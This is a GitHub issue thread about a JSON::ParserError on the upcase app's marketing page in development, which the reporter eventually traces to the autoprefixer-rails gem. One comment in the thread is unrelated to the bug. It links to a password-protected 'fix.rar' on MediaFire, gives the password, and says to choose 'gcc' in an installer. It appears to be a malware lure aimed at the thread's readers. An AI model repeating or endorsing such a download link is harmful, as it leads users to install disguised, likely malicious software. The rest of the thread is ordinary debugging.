### ISSUE TITLE
JSON::ParserError in Marketing#show

### ISSUE THREAD

**Issue by PedroAugustoRamalhoDuarte** [thoughtbot/upcase#2612]
Hello, I am trying to run `upcase` in development, but I am getting some CSS parser error.

## Reproduce steps

- `bin/setup`
- `bin/dev`
- Check `localhost:5000` in the browser

## Bug

![image](https://github.com/user-attachments/assets/13a9b0d4-d6ce-49fd-a4af-8794a8b928bd)

![image](https://github.com/user-attachments/assets/85e9b106-f2bd-432e-b625-44d632d13821)

**Comment by OtakuFra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by smaboshe** [comment]
Thank you, @PedroAugustoRamalhoDuarte!

I followed the steps you have described and was not able to reproduce the bug locally. Will try to investigate further.

**Comment by PedroAugustoRamalhoDuarte** [comment]
Thanks @smaboshe, i will try later to setup again

**Comment by PedroAugustoRamalhoDuarte** [comment]
@smaboshe I have investigated further this issue is something with `autoprefixer-rails`, I don't know if is something with my machine or distro. I have removed this gem and now is working, thanks for the attention in this issue!
